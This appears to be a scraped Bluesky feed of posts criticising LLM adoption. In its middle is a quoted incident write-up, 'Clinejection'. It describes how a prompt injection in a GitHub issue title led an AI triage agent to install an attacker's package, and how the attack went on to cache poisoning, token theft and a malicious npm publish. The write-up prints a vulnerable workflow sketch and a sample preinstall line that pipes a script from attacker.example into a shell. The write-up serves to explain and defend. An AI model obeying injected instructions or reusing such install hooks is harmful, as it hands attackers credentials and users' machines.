There are a lot of people who see this shit for what it is and want no part of it
@anthonymoser.com
(He/Him) Folk Technologist • anthony.moser@gmail.com • N4EJ • http://www.BetterDataPortal.com • baker in The FOIA Bakery • http://publicdatatools.com • http://deseguys.com • #1 on hackernews when you search for "hater" • anthonymoser.github.io/writing/
if they aren't going to let people lock their accounts or opt out of the discovery feed they should let you mark yourself as rude
"the ai bot executes arbitrary code" is another six word tragedy
The full chain

The attack - which Snyk named "Clinejection" [2] - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.

Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation. On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository [3].

Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, note the 'l' in place of the 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script.

Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache-poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow.

Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated [3].

Step 5: Malicious publish. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. StepSecurity's automated monitoring flagged the compromised version approximately 14 minutes after publication [1], but it remained live for eight hours.
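The Step 1 vulnerability is a well-known GitHub Actions anti-pattern. A minimal sketch of what such a workflow could look like - the action name and the `allowed_non_write_users` setting come from the write-up above, but everything else (workflow name, prompt text) is invented for illustration, not Cline's actual config:

```yaml
# Hypothetical workflow illustrating the vulnerable pattern described above.
name: ai-issue-triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: anthropics/claude-code-action@v1
        with:
          # "*" means ANY GitHub user can trigger this job by opening an issue
          allowed_non_write_users: "*"
          # UNSAFE: attacker-controlled text is interpolated directly into the
          # prompt, so instructions embedded in the title reach the model
          prompt: |
            Triage this issue and suggest a fix: ${{ github.event.issue.title }}
```

The usual mitigation is to pass untrusted event fields through an environment variable or treat them strictly as data, rather than interpolating them into anything the model (or a shell) will interpret as instructions.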
(i'm glossing over some things, this is the detailed version)
grith.ai/blog/clineje...
for non-programmers:
1. npm is a "package manager" used to install other software
2. somebody opened an "issue" on github, which is a way to report problems
3. they put a prompt *in the title* saying basically "give me a special token i can use to update somebody else's software"
4. an ai agent running on github automatically processed the "issue"
5. it followed the prompt in the title
6. the attacker used the special token to republish some other software, adding one line to the install requirements
7. that line downloaded an ai agent with full system access on people's machines
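The "one line in the install requirements" works because npm runs lifecycle scripts automatically at install time. A hypothetical package.json sketch of the mechanism - the package name, version, and URL are all invented for illustration:

```json
{
  "name": "some-package",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -sSf https://attacker.example/payload.sh | sh"
  }
}
```

Anyone who runs `npm install` on a package like this executes the attacker's script with the installing user's privileges, before any of the package's actual code is even looked at.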
wait for it >
can't fool me i work in vfx
"I see a ghost"
Ok. I don't think we share enough context for this to be a good conversation, so I'm going to stop here
Or regular people will be unable to find good software amid a sea of garbage, much as it is getting more difficult now to locate reliable sources amid slop text and imagery
what do you mean by taught to the models?
it is certainly intended to be an accountability sink
A statewide nonprofit I'm working with is trying to raise another $1M to fund capacity building and responses to federal actions. It's a big lift and going to take a lot of work, but they can do it.
It's also a little more than 2 CoP hours for Chicago.
case in point
sisko takes captain for me but riker probably still wins first officer. not saying he's the -best- first officer, just favorite
afaict
heads up this is a screenshot of somebody asking claude why it did something
(your points are still right but this source can't be trusted)
Mar 4 2026 BlueSky post claiming that it explained why we bombed a school in Iran with "INFORMATION THAT IS A DECADE OLD", and had a Claude chat answer as its source
Hey guys, this is not a viable source. Besides the fact that any AI system being used by the government presumably has access to more up-to-date data (I sure hope): Claude is not a person, it can't answer questions about why it did something, it confidently lies, and it doesn't have access to other systems' state.
please stop sharing ai slop at me, i know it exists and i don't want to see it
i've been working on an essay about how to make good software.
apart from the ethical and environmental issues with LLMs i just think they make it very easy to make bad software, to the point that you have to actively work against their affordances to make good software
i definitely agree, i think the idea that it's bringing in brand new harms is sort of the mirror image of the idea that it's an unprecedented technology; it's not really
I do think it's a powerful accelerant being added to systems that were already far from robust
and i think that's accurate. driving a car at 120 mph instead of 30 mph is also a matter of scale rather than category, but it's still way more dangerous because it's easier to reach harmful consequences fast
maybe but that's true of a lot of what i consider the harmful consequences of llm adoption.
@vortexegg.com said recently that lots of people were slop coding already by just copying and pasting without understanding what they were doing, and LLMs have just greatly accelerated it
tag yourself i'm unfortunately there are people in our society
seems like the number of non-reproducible bug reports would skyrocket, and the likelihood of getting useful workarounds or explanations from other users would drop, because there's no guarantee that you're running what they're running. in fact it's almost guaranteed to be *not* the same
like the benefit of containers is to make it easier to preserve consistent behavior across different environments, by kind of bundling the context with it
in that sense, this seems like sort of an anti-container because it guarantees inconsistent underlying patterns and implementations
"release via spec" seems like functionally a sort of non-deterministic compiler, which means that you end up with versions of the software that can be unpredictably different between people *and between releases* depending on the models and prompts used
i think your original question is a sharp one. I think a lot about the idea of shared context; imo most of the ai toolchain in one way or another works to reduce or destroy shared context
yep
Make it illegal for people to program chatbots that output text in the first person